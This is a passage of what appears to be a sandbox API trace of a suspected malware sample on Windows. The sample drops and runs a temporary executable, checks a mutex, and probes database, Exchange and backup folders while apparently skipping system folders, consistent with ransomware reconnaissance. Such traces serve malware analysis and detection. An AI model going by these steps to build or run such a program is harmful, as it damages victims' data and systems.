(hMem=0x45000c) returned 0 [0100.382] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.382] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.382] GlobalUnlock (hMem=0x45000c) returned 0 [0100.382] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.382] GlobalLock (hMem=0x450004) returned 0x56f100 [0100.382] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.382] GlobalUnlock (hMem=0x45000c) returned 0 [0100.382] GlobalHandle (pMem=0x56f100) returned 0x450004 [0100.382] GlobalUnlock (hMem=0x450004) returned 0 [0100.382] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.382] 
GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.382] GlobalUnlock (hMem=0x450004) returned 0 [0100.382] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.382] GlobalLock (hMem=0x45000c) returned 0x56f100 [0100.382] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.382] GlobalUnlock (hMem=0x450004) returned 0 [0100.382] GlobalHandle (pMem=0x56f100) returned 0x45000c [0100.382] GlobalUnlock (hMem=0x45000c) returned 0 [0100.382] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.382] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.382] GlobalUnlock (hMem=0x45000c) returned 0 [0100.382] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.382] GlobalLock (hMem=0x450004) returned 0x56f100 [0100.382] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.382] GlobalUnlock (hMem=0x45000c) returned 0 [0100.383] GlobalHandle (pMem=0x56f100) returned 0x450004 [0100.383] GlobalUnlock (hMem=0x450004) returned 0 [0100.383] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.383] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.383] GlobalUnlock (hMem=0x450004) returned 0 [0100.383] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.383] GlobalLock (hMem=0x45000c) returned 0x56f100 [0100.383] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.383] GlobalUnlock (hMem=0x450004) returned 0 [0100.383] GlobalHandle (pMem=0x56f100) returned 0x45000c [0100.383] GlobalUnlock (hMem=0x45000c) returned 0 [0100.383] RegCloseKey (hKey=0x190) returned 0x0 [0100.383] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.383] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.383] GlobalUnlock (hMem=0x45000c) returned 0 [0100.383] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.383] GlobalLock (hMem=0x450004) returned 0x56f100 [0100.383] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.383] GlobalUnlock (hMem=0x45000c) returned 0 [0100.383] GlobalHandle (pMem=0x56f100) returned 0x450004 [0100.383] GlobalUnlock (hMem=0x450004) returned 0 [0100.383] GetEnvironmentVariableA 
(in: lpName="temp", lpBuffer=0x18fa14, nSize=0x400 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x24 [0100.385] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e79f28, cbMultiByte=49, lpWideCharStr=0x18ee10, cchWideChar=2047 | out: lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\$TMP$001.exe") returned 49 [0100.385] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\$TMP$001.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\$tmp$001.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0100.387] WriteFile (in: hFile=0x190, lpBuffer=0x1e17f08*, nNumberOfBytesToWrite=0xae00, lpNumberOfBytesWritten=0x18fe04, lpOverlapped=0x0 | out: lpBuffer=0x1e17f08*, lpNumberOfBytesWritten=0x18fe04*=0xae00, lpOverlapped=0x0) returned 1 [0100.389] CloseHandle (hObject=0x190) returned 1 [0100.481] WinExec (lpCmdLine="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\$TMP$001.exe", uCmdShow=0x1) returned 0x21 [0103.186] GetTickCount () returned 0x114d9ad [0103.186] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4044d8, lpParameter=0x1ea1ba0, dwCreationFlags=0x0, lpThreadId=0x18fe10 | out: lpThreadId=0x18fe10*=0x9ec) returned 0x18c [0103.188] GetTickCount () returned 0x114d9ad [0103.188] Sleep (dwMilliseconds=0x1) [0103.200] GetTickCount () returned 0x114d9bc [0103.200] Sleep (dwMilliseconds=0x1) [0103.217] GetTickCount () returned 0x114d9cc [0103.217] Sleep (dwMilliseconds=0x1) [0103.232] GetTickCount () returned 0x114d9dc [0103.232] Sleep (dwMilliseconds=0x1) [0103.250] GetTickCount () returned 0x114d9eb [0103.250] Sleep (dwMilliseconds=0x1) [0103.263] CloseHandle (hObject=0x18c) returned 1 [0103.263] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea1ba8, cbMultiByte=3, lpWideCharStr=0x18ee00, cchWideChar=2047 | out: lpWideCharStr="C:\\") 
returned 3 [0103.264] GlobalLock (hMem=0x450004) returned 0x588f38 [0103.264] GlobalHandle (pMem=0x588f38) returned 0x450004 [0103.264] GlobalUnlock (hMem=0x450004) returned 0 [0103.264] GlobalLock (hMem=0x450004) returned 0x588f38 [0103.264] GlobalLock (hMem=0x45000c) returned 0x56f100 [0103.264] GlobalHandle (pMem=0x588f38) returned 0x450004 [0103.264] GlobalUnlock (hMem=0x450004) returned 0 [0103.264] GlobalHandle (pMem=0x56f100) returned 0x45000c [0103.264] GlobalUnlock (hMem=0x45000c) returned 0 [0103.264] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0103.264] SysReAllocStringLen (in: pbstr=0x18fe04*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x18fe04*="C:\\") returned 1 [0103.264] GlobalLock (hMem=0x45000c) returned 0x588f38 [0103.264] GlobalHandle (pMem=0x588f38) returned 0x45000c [0103.264] GlobalUnlock (hMem=0x45000c) returned 0 [0103.264] GlobalLock (hMem=0x45000c) returned 0x588f38 [0103.264] GlobalLock (hMem=0x450004) returned 0x56f100 [0103.264] GlobalHandle (pMem=0x588f38) returned 0x45000c [0103.264] GlobalUnlock (hMem=0x45000c) returned 0 [0103.264] GlobalHandle (pMem=0x56f100) returned 0x450004 [0103.264] GlobalUnlock (hMem=0x450004) returned 0 [0103.265] FindFirstFileW (in: lpFileName="C:\\Microsoft\\Exchange Server", lpFindFileData=0x18f880 | out: lpFindFileData=0x18f880*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x5f30d65, dwReserved1=0xd646935e, cFileName="ᚏ䈜ގ", cAlternateFileName="䱈@㯦V㮺V企@ﭰ\x18㳔V︌\x18\x1b")) returned 0xffffffff [0103.265] GetLastError () returned 0x3 [0103.265] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.265] MultiByteToWideChar (in: 
CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d270, cbMultiByte=26, lpWideCharStr=0x18ea84, cchWideChar=2047 | out: lpWideCharStr="microsoft\\exchange server\\\x1b") returned 26 [0103.265] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e17f28, cbMultiByte=21, lpWideCharStr=0x18eacc, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server\\rver\\") returned 21 [0103.265] FindFirstFileW (in: lpFileName="C:\\Microsoft SQL Server", lpFindFileData=0x18f880 | out: lpFindFileData=0x18f880*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x5f30d65, dwReserved1=0xd646935e, cFileName="ᚏ䈜ގ", cAlternateFileName="㚬X䱠@㮴V企@ﭰ\x18㶬V︌\x181")) returned 0xffffffff [0103.265] GetLastError () returned 0x2 [0103.266] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.266] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d270, cbMultiByte=21, lpWideCharStr=0x18ea84, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server\\\x18\x15") returned 21 [0103.266] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e17f28, cbMultiByte=9, lpWideCharStr=0x18eacc, cchWideChar=2047 | out: lpWideCharStr="Firebird\\ SQL Server\\rver\\") returned 9 [0103.266] FindFirstFileW (in: lpFileName="C:\\Firebird", lpFindFileData=0x18f880 | out: lpFindFileData=0x18f880*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x5f30d65, 
dwReserved1=0xd646935e, cFileName="ᚏ䈜ގ", cAlternateFileName="㚬X䱠@㳔V企@ﭰ\x18㗤X︌\x18;")) returned 0xffffffff [0103.266] GetLastError () returned 0x2 [0103.266] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.266] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99c0, cbMultiByte=9, lpWideCharStr=0x18ea84, cchWideChar=2047 | out: lpWideCharStr="firebird\\") returned 9 [0103.266] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e17f28, cbMultiByte=8, lpWideCharStr=0x18eacc, cchWideChar=2047 | out: lpWideCharStr="MSSQL.1\\\\ SQL Server\\rver\\") returned 8 [0103.266] FindFirstFileW (in: lpFileName="C:\\MSSQL.1", lpFindFileData=0x18f880 | out: lpFindFileData=0x18f880*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x5f30d65, dwReserved1=0xd646935e, cFileName="ᚏ䈜ގ", cAlternateFileName="㚬X䱠@㚄X企@ﭰ\x18㞜X︌\x18D")) returned 0xffffffff [0103.267] GetLastError () returned 0x2 [0103.267] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.267] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99c0, cbMultiByte=8, lpWideCharStr=0x18ea84, cchWideChar=2047 | out: lpWideCharStr="mssql.1\\ ") returned 8 [0103.267] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e17f28, cbMultiByte=37, lpWideCharStr=0x18eacc, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server Compact Edition\\") returned 37 [0103.267] FindFirstFileW (in: lpFileName="C:\\Microsoft SQL Server Compact Edition", lpFindFileData=0x18f880 | out: lpFindFileData=0x18f880*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, 
ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x5f30d65, dwReserved1=0xd646935e, cFileName="ᚏ䈜ގ", cAlternateFileName="㚬X䱠@㗤X企@ﭰ\x18伤W︌\x18j")) returned 0xffffffff [0103.267] GetLastError () returned 0x2 [0103.267] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.267] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac08, cbMultiByte=37, lpWideCharStr=0x18ea84, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server compact edition\\icrosoft SQL Server Compact Edition\\") returned 37 [0103.268] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e17f28, cbMultiByte=6, lpWideCharStr=0x18eacc, cchWideChar=2047 | out: lpWideCharStr="Adobe\\oft SQL Server Compact Edition\\") returned 6 [0103.268] FindFirstFileW (in: lpFileName="C:\\Adobe", lpFindFileData=0x18f880 | out: lpFindFileData=0x18f880*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x5f30d65, dwReserved1=0xd646935e, cFileName="ᚏ䈜ގ", cAlternateFileName="㚬X䱠@幌W企@ﭰ\x18㝴X︌\x18q")) returned 0xffffffff [0103.268] GetLastError () returned 0x2 [0103.268] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.268] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99c0, cbMultiByte=6, lpWideCharStr=0x18ea84, cchWideChar=2047 | out: lpWideCharStr="adobe\\传Wð") returned 6 [0103.268] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e17f28, cbMultiByte=7, lpWideCharStr=0x18eacc, cchWideChar=2047 | out: 
lpWideCharStr="Oracle\\ft SQL Server Compact Edition\\") returned 7 [0103.268] FindFirstFileW (in: lpFileName="C:\\Oracle", lpFindFileData=0x18f880 | out: lpFindFileData=0x18f880*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x5f30d65, dwReserved1=0xd646935e, cFileName="ᚏ䈜ގ", cAlternateFileName="㚬X䱠@㕬X企@ﭰ\x18㗤X︌\x18y")) returned 0xffffffff [0103.269] GetLastError () returned 0x2 [0103.269] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.269] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99c0, cbMultiByte=7, lpWideCharStr=0x18ea84, cchWideChar=2047 | out: lpWideCharStr="oracle\\X ") returned 7 [0103.269] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e17f28, cbMultiByte=7, lpWideCharStr=0x18eacc, cchWideChar=2047 | out: lpWideCharStr="Archiveft SQL Server Compact Edition\\") returned 7 [0103.269] FindFirstFileW (in: lpFileName="C:\\Archive", lpFindFileData=0x18f880 | out: lpFindFileData=0x18f880*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x5f30d65, dwReserved1=0xd646935e, cFileName="ᚏ䈜ގ", cAlternateFileName="㚬X䱠@㝴X企@ﭰ\x18㚄X︌\x18\x81")) returned 0xffffffff [0103.269] GetLastError () returned 0x2 [0103.269] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.269] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99c0, cbMultiByte=7, lpWideCharStr=0x18ea84, 
cchWideChar=2047 | out: lpWideCharStr="archiveX ") returned 7 [0103.269] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e17f28, cbMultiByte=6, lpWideCharStr=0x18eacc, cchWideChar=2047 | out: lpWideCharStr="Backupeft SQL Server Compact Edition\\") returned 6 [0103.270] FindFirstFileW (in: lpFileName="C:\\Backup", lpFindFileData=0x18f880 | out: lpFindFileData=0x18f880*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x5f30d65, dwReserved1=0xd646935e, cFileName="ᚏ䈜ގ", cAlternateFileName="㚬X䱠@㗤X企@ﭰ\x18㕬X︌\x18\x88")) returned 0xffffffff [0103.270] GetLastError () returned 0x2 [0103.270] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.270] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99c0, cbMultiByte=6, lpWideCharStr=0x18ea84, cchWideChar=2047 | out: lpWideCharStr="backup㚀X ") returned 6 [0103.270] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e17f28, cbMultiByte=6, lpWideCharStr=0x18eacc, cchWideChar=2047 | out: lpWideCharStr="Reserveft SQL Server Compact Edition\\") returned 6 [0103.270] FindFirstFileW (in: lpFileName="C:\\Reserv", lpFindFileData=0x18f880 | out: lpFindFileData=0x18f880*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x5f30d65, dwReserved1=0xd646935e, cFileName="ᚏ䈜ގ", cAlternateFileName="㚬X䱠@㚄X企@ﭰ\x18㝴X︌\x18\x8f")) returned 0xffffffff [0103.270] GetLastError () returned 0x2 
[0103.271] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.271] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99c0, cbMultiByte=6, lpWideCharStr=0x18ea84, cchWideChar=2047 | out: lpWideCharStr="reserv㕨X ") returned 6 [0103.271] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e17f28, cbMultiByte=7, lpWideCharStr=0x18eacc, cchWideChar=2047 | out: lpWideCharStr="Restoreft SQL Server Compact Edition\\") returned 7 [0103.271] FindFirstFileW (in: lpFileName="C:\\Restore", lpFindFileData=0x18f880 | out: lpFindFileData=0x18f880*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x5f30d65, dwReserved1=0xd646935e, cFileName="ᚏ䈜ގ", cAlternateFileName="㚬X䱠@㕬X企@ﭰ\x18㗤X︌\x18\x97")) returned 0xffffffff [0103.271] GetLastError () returned 0x2 [0103.271] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.271] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99c0, cbMultiByte=7, lpWideCharStr=0x18ea84, cchWideChar=2047 | out: lpWideCharStr="restoreX ") returned 7 [0103.272] GlobalLock (hMem=0x450004) returned 0x588f38 [0103.272] GlobalHandle (pMem=0x588f38) returned 0x450004 [0103.272] GlobalUnlock (hMem=0x450004) returned 0 [0103.272] GlobalLock (hMem=0x450004) returned 0x588f38 [0103.272] GlobalLock (hMem=0x45000c) returned 0x56f100 [0103.272] GlobalHandle (pMem=0x588f38) returned 0x450004 [0103.272] GlobalUnlock (hMem=0x450004) returned 0 [0103.272] GlobalHandle (pMem=0x56f100) returned 0x45000c [0103.272] GlobalUnlock (hMem=0x45000c) returned 0 [0103.272] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.272] 
GetEnvironmentVariableA (in: lpName="ALLUSERSPROFILE", lpBuffer=0x18f67c, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0103.272] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aae8, cbMultiByte=15, lpWideCharStr=0x18ea7c, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\") returned 15 [0103.272] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.272] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x18f67c, nSize=0x400 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d [0103.272] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e79fe8, cbMultiByte=46, lpWideCharStr=0x18ea7c, cchWideChar=2047 | out: lpWideCharStr="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 46 [0103.273] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.273] GetEnvironmentVariableA (in: lpName="ProgramData", lpBuffer=0x18f67c, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0103.273] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab28, cbMultiByte=15, lpWideCharStr=0x18ea7c, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 15 [0103.273] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.273] GetEnvironmentVariableA (in: lpName="WINDIR", lpBuffer=0x18f67c, nSize=0x400 | out: lpBuffer="C:\\Windows") returned 0xa [0103.273] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9bb8, cbMultiByte=11, lpWideCharStr=0x18ea7c, cchWideChar=2047 | out: lpWideCharStr="c:\\windows\\ata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 11 [0103.273] GlobalLock (hMem=0x45000c) returned 0x588f38 [0103.273] GlobalHandle (pMem=0x588f38) returned 0x45000c [0103.273] GlobalUnlock 
(hMem=0x45000c) returned 0 [0103.273] GlobalLock (hMem=0x45000c) returned 0x588f38 [0103.273] GlobalLock (hMem=0x450004) returned 0x56f100 [0103.273] GlobalHandle (pMem=0x588f38) returned 0x45000c [0103.273] GlobalUnlock (hMem=0x45000c) returned 0 [0103.273] GlobalHandle (pMem=0x56f100) returned 0x450004 [0103.273] GlobalUnlock (hMem=0x450004) returned 0 [0103.274] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.274] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab28, cbMultiByte=15, lpWideCharStr=0x18ea84, cchWideChar=2047 | out: lpWideCharStr=":\\$recycle.bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 15 [0103.274] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.274] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99c0, cbMultiByte=11, lpWideCharStr=0x18ea84, cchWideChar=2047 | out: lpWideCharStr="\\all users\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 11 [0103.274] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.274] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99c0, cbMultiByte=9, lpWideCharStr=0x18ea84, cchWideChar=2047 | out: lpWideCharStr="\\appdata\\s\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 9 [0103.274] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.274] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab28, cbMultiByte=18, lpWideCharStr=0x18ea84, cchWideChar=2047 | out: lpWideCharStr="\\application data\\alpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 18 [0103.275] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.275] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=28, lpWideCharStr=0x18ea84, 
cchWideChar=2047 | out: lpWideCharStr=":\\system volume information\\pdata\\roaming\\eft SQL Server Compact Edition\\") returned 28 [0103.275] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.275] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99c0, cbMultiByte=10, lpWideCharStr=0x18ea84, cchWideChar=2047 | out: lpWideCharStr=":\\windows\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\") returned 10 [0103.275] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.275] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99c0, cbMultiByte=8, lpWideCharStr=0x18ea84, cchWideChar=2047 | out: lpWideCharStr=":\\intel\\s\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\") returned 8 [0103.275] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.275] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99c0, cbMultiByte=9, lpWideCharStr=0x18ea84, cchWideChar=2047 | out: lpWideCharStr=":\\nvidia\\\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\") returned 9 [0103.275] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0103.275] SHGetMalloc (in: ppMalloc=0x18facc | out: ppMalloc=0x18facc*=0x767666bc) returned 0x0 [0103.276] SHGetSpecialFolderLocation (in: hwnd=0x0, csidl=0, ppidl=0x18fac8 | out: ppidl=0x18fac8) returned 0x0 [0103.280] SHGetPathFromIDListW (in: pidl=0x578208, pszPath=0x57c6b4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0103.280] SysReAllocStringLen (in: pbstr=0x18fb50*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", len=0x25 | out: pbstr=0x18fb50*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0103.281] IMalloc:Free (This=0x767666bc, pv=0x578208) [0103.281] IUnknown:AddRef (This=0x767666bc) returned 0x1 [0103.281] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS 
